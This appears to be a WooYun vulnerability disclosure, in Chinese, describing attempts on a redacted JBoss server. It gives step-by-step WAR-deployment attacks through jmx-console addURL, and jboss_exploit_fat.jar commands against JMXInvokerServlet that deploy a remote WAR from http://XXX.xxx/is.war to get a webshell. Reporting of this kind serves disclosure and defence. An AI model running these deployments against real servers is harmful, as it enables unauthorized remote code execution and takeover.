WooYun.org

目标：**.**.**.**     **.**.**.**    其实两个域名解析的是同一地址

远程部署war包I（admin-console）：http://**.**.**.**/admin-console/可惜，此站该页被删

远程部署war包II（jmx-console）：http://**.**.**.**/jmx-console/

点击jboss.deployment.flavor=URL,type=DeploymentScanner

进入JMX MBean View后找到void addURL()，填入对外公开的war包地址，然后invoke

返回查看MBean View，已经部署成功

这里不知道什么原因没能获取shell，待进一步思考(目测是有狗)

远程部署war包III（InvokerServlet）：查看基本信息并getshell失败

查看系统名称：
C:\Users\Aerfa>java -jar c:/jboss_exploit_fat.jar -i http://**.**.**.**/in
voker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

查看系统版本
C:\Users\Aerfa>java -jar c:/jboss_exploit_fat.jar -i http://**.**.**.**/in
voker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion

远程部署war包（失败）
C:\Users\Aerfa>java -jar c:/jboss_exploit_fat.jar -i http://**.**.**.**/in
voker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://XXX.xxx/is.war

远程部署war包IIII（web-console）：http://**.**.**.**/web-console/获取基本配置信息(未尝试获取webshell)

时间来不及了，前两种的getshell失败，没有信心，留下次学习吧。
更多jboss学习资料：**.**.**.**/papers/178